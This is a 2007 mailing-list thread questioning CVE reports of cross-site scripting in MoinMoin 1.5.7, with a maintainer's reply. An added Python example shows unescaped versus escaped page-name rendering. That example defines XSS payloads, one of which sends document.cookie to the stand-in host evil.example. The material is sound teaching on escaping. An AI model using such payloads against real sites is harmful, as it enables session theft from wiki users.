It's come to my attention that a few relatively recent security reports
allege vulnerabilities including cross-site scripting in MoinMoin up to
and including release 1.5.7.
However, I've been able to find no corroborating information on the
moinmoin site, mailing list, or changelog
(http://moinmoin.wikiwikiweb.de/MoinMoinRelease1.5/CHANGES), making me a
bit suspicious the reports are incorrect, since I would assume the
MoinMoin site would be among the first to know, or be notified, about
These reports refer to CVE-2007-0901 and CVE-2007-0902:
which in turn cite sources like secunia.com and securityfocus.com.
Notably, one CVE citation refers to ubuntu.com although the ubuntu
report itself appears to apply to moinmoin-1.5.3 and lower.
So it seems to me that these security reports may be incorrect in
listing the 1.5.7 release as vulnerable; rather, it may be a problem
with an earlier version and CVE is incorrect that this applies to the
newest release, 1.5.7 (or am I missing
Does anyone know about the validity of these security reports w.r.t.
From: Thomas Waldmann <tw-public@gm...> - 2007-03-17 13:24:05
> It's come to my attention that a few relatively recent security reports
> allege vulnerabilities including cross-site scripting in MoinMoin up to
> and including release 1.5.7
The pagename (AttachFile, RenamePage, LocalSiteMap) and page info XSS
bugs were fixed in 1.5.7 and this is documented in docs/CHANGES.
The other report advising show_traceback (this seems to be a 3rd party
patch, not a moin feature) as a solution for another potential
vulnerability is rather vague about what the exact problem is and what
the exploit could be.
Whether showing version numbers of some involved software (OS, Python,
Moin) is a security bug by itself is debatable. One thing is sure: if
we disable tracebacks and version information, the reported bugs by our
users would be of much lower quality and debugging would be harder and
In general, I must say that I am a bit disappointed with the quality of
such security reports and some security news (like that on heise
recently). They are partly incorrect, rather vague and sometimes seem to
over-hype things a bit (like heise first saying that you could execute
code on the SERVER; they fixed it some hours later) and heavy
crosslinking of such things doesn't help either.
Of course XSS is a problem, but, for the recent moin cases, it is not
something to panic about.
here>Bla, you will notice that on RecentChanges. Similar thing if
someone tries to trick you to go to some URL of that kind, you will
notice it (hopefully) before you click.
If you can be tricked into such stuff, I guess you will be "phished"
daily anyway (and those guys don't just steal your moin cookie, but $$$$
from your bank/paypal/whatever account).
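The class of bug discussed in this thread (a page name echoed into the HTML of an action such as AttachFile or the page info view without escaping) is easy to show in a few lines. The following is an added example written for this page, not code from the thread or from MoinMoin itself: the heading text, the action name and the hostile page names are constructed for illustration, and the vulnerable/fixed pair only models the pattern, not the actual 1.5.x code paths. It renders a heading and a link from a page name both ways and uses Python's own HTML parser to show which tags the browser would actually see.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed hostile page names (not taken from any real report).
# The first breaks out of an attribute, the second injects a script element.
EVIL_PAGENAME = '"><img src=x onerror=alert(document.cookie)>'
EVIL_PAGENAME_SCRIPT = "<script>document.location='http://evil.example/?'+document.cookie</script>"


def render_attach_heading_vulnerable(pagename):
    """Models the bug: the page name is pasted into HTML text unescaped."""
    return "<h2>Attachments for %s</h2>" % pagename


def render_attach_heading_fixed(pagename):
    """Same heading with the page name escaped for an HTML text context."""
    return "<h2>Attachments for %s</h2>" % html.escape(pagename, quote=True)


def render_action_link_fixed(pagename, action):
    """A link to an action on the page: the name is URL-encoded inside href
    and HTML-escaped as the visible link text, because the two contexts have
    different metacharacters. 'action' is a hypothetical parameter name."""
    return '<a href="/%s?action=%s">%s</a>' % (
        quote(pagename, safe=""),
        quote(action, safe=""),
        html.escape(pagename, quote=True),
    )


class _TagCollector(HTMLParser):
    """Records every element start tag the parser sees, in order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    """Return the list of element names a browser would create from markup.
    Any tag beyond the ones the template itself emits means injection."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def is_clean(markup, expected_tags):
    """True when the rendered markup contains only the template's own tags."""
    return tags_in(markup) == list(expected_tags)


if __name__ == "__main__":
    for name in (EVIL_PAGENAME, EVIL_PAGENAME_SCRIPT):
        print("vulnerable:", tags_in(render_attach_heading_vulnerable(name)))
        print("fixed:     ", tags_in(render_attach_heading_fixed(name)))
        print("link:      ", tags_in(render_action_link_fixed(name, "info")))
```

The point the parser makes is that escaping is per output context: `html.escape` is right for element text and (with `quote=True`) for quoted attribute values, while a page name going into a URL path or query string must be percent-encoded instead, otherwise the `"` or `>` survives into the href. Whichever template language a wiki uses, the check is the same: feed the rendered page through a real HTML parser and confirm no element appeared that the template did not put there.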